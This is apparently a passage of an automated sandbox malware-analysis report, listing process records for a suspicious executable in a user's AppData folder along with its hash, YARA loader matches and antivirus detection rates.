                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000000.495309818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.619906985.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.620597742.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high

                                                                                        Target ID:17
                                                                                        Start time:00:44:26
                                                                                        Start date:14/10/2022
                                                                                        Path:C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe"
                                                                                        Imagebase:0x6c0000
                                                                                        File size:8192 bytes
                                                                                        MD5 hash:A93394C0D7A32E0AE2BA43A6FD881301
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 22%, Virustotal, Browse
                                                                                        Reputation:low

                                                                                        Target ID:18
                                                                                        Start time:00:44:35
                                                                                        Start date:14/10/2022
                                                                                        Path:C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe"
                                                                                        Imagebase:0x230000
                                                                                        File size:8192 bytes
                                                                                        MD5 hash:A93394C0D7A32E0AE2BA43A6FD881301
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Reputation:low

                                                                                        No disassembly